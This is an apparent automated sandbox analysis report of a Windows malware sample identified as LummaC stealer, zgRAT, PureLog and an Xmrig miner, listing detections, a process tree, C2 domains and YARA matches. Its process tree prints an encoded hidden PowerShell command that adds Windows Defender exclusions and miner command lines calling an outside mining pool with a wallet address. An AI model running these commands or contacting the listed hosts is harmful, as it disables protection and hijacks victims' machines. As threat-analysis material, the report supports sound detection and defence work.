Edit tour

Windows Analysis Report
PT54FFSL7ET46RASB.exe

Overview

General Information

Sample name:	PT54FFSL7ET46RASB.exe
Analysis ID:	1513635
MD5:	8199c105289d70af5446c7fd64496d7b
SHA1:	8402abc838e34e9dd996127ec39481f7cda4372b
SHA256:	ffee1e842c0a7932d3d3905a6677f35f3ea29dfb48661e537d28eb8b7212669d
Tags:	exe
Infos:

Detection

LummaC, PureLog Stealer, Xmrig, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Xmrig

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Detected Stratum mining protocol

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Potential Crypto Mining Activity

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Tries to harvest and steal Bitcoin Wallet information

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected PersistenceViaHiddenTask

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Suspicious Execution of Powershell with Base64

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

PT54FFSL7ET46RASB.exe (PID: 5712 cmdline: "C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe" MD5: 8199C105289D70AF5446C7FD64496D7B)

conhost.exe (PID: 1664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 6184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

HPd7I3vQri.exe (PID: 5476 cmdline: "C:\Users\user\AppData\Roaming\HPd7I3vQri.exe" MD5: C164ED9887BD51CBA150379514DC4E81)

cmd.exe (PID: 2528 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2348 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

PING.EXE (PID: 420 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)

l6E.exe (PID: 4788 cmdline: "C:\Users\user\AppData\Roaming\l6E.exe" MD5: FAC2188E4A28A0CF32BF4417D797B0F8)

conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4800 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1780 MD5: C31336C1EFC2CCB44B4326EA793040F2)

yTRfYxWiym.exe (PID: 764 cmdline: "C:\Users\user\AppData\Roaming\yTRfYxWiym.exe" MD5: FD3AD0AE7FE1BBEE4B2F2BD43A359393)

powershell.exe (PID: 3604 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2144 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

Current.exe (PID: 3060 cmdline: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe MD5: FD3AD0AE7FE1BBEE4B2F2BD43A359393)

aspnet_compiler.exe (PID: 3512 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe MD5: DF5419B32657D2896514B6A1D041FE08)

AddInProcess.exe (PID: 6116 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)

AddInProcess.exe (PID: 5320 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)

Current.exe (PID: 3640 cmdline: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe MD5: FD3AD0AE7FE1BBEE4B2F2BD43A359393)

svchost.exe (PID: 6448 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 508 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4800 -ip 4800 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["tendencctywop.shop", "reggwardssdqw.shop", "eemmbryequo.shop", "tryyudjasudqo.shop", "tesecuuweqo.shop", "licenseodqwmqn.shop", "keennylrwmqlw.shop", "relaxatinownio.shop"], "Build id": "hv0fRu--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2193885357.000002EACD240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000E.00000002.2354734998.000000014079A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000008.00000002.2265321541.0000010E10535000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.2247370156.0000010E00001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.2198386287.000002EADF275000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x46308:$a1: mining.set_target 0x40de0:$a2: XMRIG_HOSTNAME 0x42eb0:$a3: Usage: xmrig [OPTIONS] 0x40db8:$a4: XMRIG_VERSION
00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0000000F.00000002.4611056195.000002DFC8099000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.2204489074.000002EAE7913000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000010.00000002.2757993264.000002D61D261000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x468d8:$a1: mining.set_target 0x413b0:$a2: XMRIG_HOSTNAME 0x43480:$a3: Usage: xmrig [OPTIONS] 0x41388:$a4: XMRIG_VERSION
00000005.00000002.2194703677.000002EACED41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2765446003.000002D62D795000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.4611134630.0000020880001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2765446003.000002D62D58D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000F.00000002.4611056195.000002DFC8038000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000010.00000002.2757993264.000002D61D372000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2765446003.000002D62D3B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2765446003.000002D62D565000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.4690508162.0000020890FF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000E.00000002.2354734998.0000000140000000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x45ad0:$a1: mining.set_target 0x405a8:$a2: XMRIG_HOSTNAME 0x42678:$a3: Usage: xmrig [OPTIONS] 0x40580:$a4: XMRIG_VERSION
Process Memory Space: yTRfYxWiym.exe PID: 764	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: yTRfYxWiym.exe PID: 764	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Current.exe PID: 3060	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: Current.exe PID: 3060	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 3512	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 3512	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 3512	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x8c305:$a1: mining.set_target 0xc6ed7:$a1: mining.set_target 0x881c3:$a2: XMRIG_HOSTNAME 0xc2d95:$a2: XMRIG_HOSTNAME 0x894df:$a3: Usage: xmrig [OPTIONS] 0xc40b1:$a3: Usage: xmrig [OPTIONS] 0x881a4:$a4: XMRIG_VERSION 0xc2d76:$a4: XMRIG_VERSION
Process Memory Space: AddInProcess.exe PID: 6116	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: AddInProcess.exe PID: 6116	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x8bed0:$a1: mining.set_target 0x87d8e:$a2: XMRIG_HOSTNAME 0x890aa:$a3: Usage: xmrig [OPTIONS] 0x87d6f:$a4: XMRIG_VERSION
Process Memory Space: AddInProcess.exe PID: 5320	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: Current.exe PID: 3640	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.Current.exe.2d62d5b5b70.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
8.2.Current.exe.10e10535be0.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.yTRfYxWiym.exe.2eacd240000.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Current.exe.2d62d3b19e0.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.yTRfYxWiym.exe.2eadf045b38.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Current.exe.2d62d565b38.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Current.exe.2d62d795be0.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.yTRfYxWiym.exe.2eadf06db70.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.HPd7I3vQri.exe.65f0000.3.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.2.HPd7I3vQri.exe.65f0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.HPd7I3vQri.exe.65f0000.3.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xcec42:$s1: file:/// 0xceb52:$s2: {11111-22222-10009-11112} 0xcebd2:$s3: {11111-22222-50001-00000} 0xc81a4:$s4: get_Module 0xc8588:$s5: Reverse 0xcda70:$s6: BlockCopy 0xbe846:$s7: ReadByte 0xcec54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
5.2.yTRfYxWiym.exe.2eadf045b38.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
16.2.Current.exe.2d62d565b38.8.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.yTRfYxWiym.exe.2eadf275be0.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.HPd7I3vQri.exe.65f0000.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.2.HPd7I3vQri.exe.65f0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.HPd7I3vQri.exe.65f0000.3.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a42:$s1: file:/// 0xd0952:$s2: {11111-22222-10009-11112} 0xd09d2:$s3: {11111-22222-50001-00000} 0xc9fa4:$s4: get_Module 0xca388:$s5: Reverse 0xcf870:$s6: BlockCopy 0xc0646:$s7: ReadByte 0xd0a54:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
5.2.yTRfYxWiym.exe.2eadf315c18.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.aspnet_compiler.exe.2089153ee30.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
14.2.AddInProcess.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
14.2.AddInProcess.exe.140000000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4aa4d8:$a1: mining.set_target 0x4a4fb0:$a2: XMRIG_HOSTNAME 0x4a7080:$a3: Usage: xmrig [OPTIONS] 0x4a4f88:$a4: XMRIG_VERSION
14.2.AddInProcess.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4b0fa0:$x1: donate.ssl.xmrig.com 0x4b1471:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
14.2.AddInProcess.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4b1980:$s1: %s/%s (Windows NT %lu.%lu 0x4b2ab0:$s3: \\.\WinRing0_ 0x4a9278:$s4: pool_wallet 0x4a4828:$s5: cryptonight 0x4a4838:$s5: cryptonight 0x4a4848:$s5: cryptonight 0x4a4858:$s5: cryptonight 0x4a4870:$s5: cryptonight 0x4a4880:$s5: cryptonight 0x4a4890:$s5: cryptonight 0x4a48a8:$s5: cryptonight 0x4a48b8:$s5: cryptonight 0x4a48d0:$s5: cryptonight 0x4a48e8:$s5: cryptonight 0x4a48f8:$s5: cryptonight 0x4a4908:$s5: cryptonight 0x4a4918:$s5: cryptonight 0x4a4930:$s5: cryptonight 0x4a4948:$s5: cryptonight 0x4a4958:$s5: cryptonight 0x4a4968:$s5: cryptonight
9.2.aspnet_compiler.exe.208910155f8.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
14.2.AddInProcess.exe.140000000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
9.2.aspnet_compiler.exe.2089153ee30.2.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
9.2.aspnet_compiler.exe.2089153ee30.2.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4a90d8:$a1: mining.set_target 0x4a3bb0:$a2: XMRIG_HOSTNAME 0x4a5c80:$a3: Usage: xmrig [OPTIONS] 0x4a3b88:$a4: XMRIG_VERSION
9.2.aspnet_compiler.exe.2089153ee30.2.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4afba0:$x1: donate.ssl.xmrig.com 0x4b0071:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
9.2.aspnet_compiler.exe.2089153ee30.2.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4b0580:$s1: %s/%s (Windows NT %lu.%lu 0x4b16b0:$s3: \\.\WinRing0_ 0x4a7e78:$s4: pool_wallet 0x4a3428:$s5: cryptonight 0x4a3438:$s5: cryptonight 0x4a3448:$s5: cryptonight 0x4a3458:$s5: cryptonight 0x4a3470:$s5: cryptonight 0x4a3480:$s5: cryptonight 0x4a3490:$s5: cryptonight 0x4a34a8:$s5: cryptonight 0x4a34b8:$s5: cryptonight 0x4a34d0:$s5: cryptonight 0x4a34e8:$s5: cryptonight 0x4a34f8:$s5: cryptonight 0x4a3508:$s5: cryptonight 0x4a3518:$s5: cryptonight 0x4a3530:$s5: cryptonight 0x4a3548:$s5: cryptonight 0x4a3558:$s5: cryptonight 0x4a3568:$s5: cryptonight
9.2.aspnet_compiler.exe.208910155f8.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
9.2.aspnet_compiler.exe.208910155f8.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4a90d8:$a1: mining.set_target 0x4a3bb0:$a2: XMRIG_HOSTNAME 0x4a5c80:$a3: Usage: xmrig [OPTIONS] 0x4a3b88:$a4: XMRIG_VERSION
9.2.aspnet_compiler.exe.208910155f8.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4afba0:$x1: donate.ssl.xmrig.com 0x4b0071:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
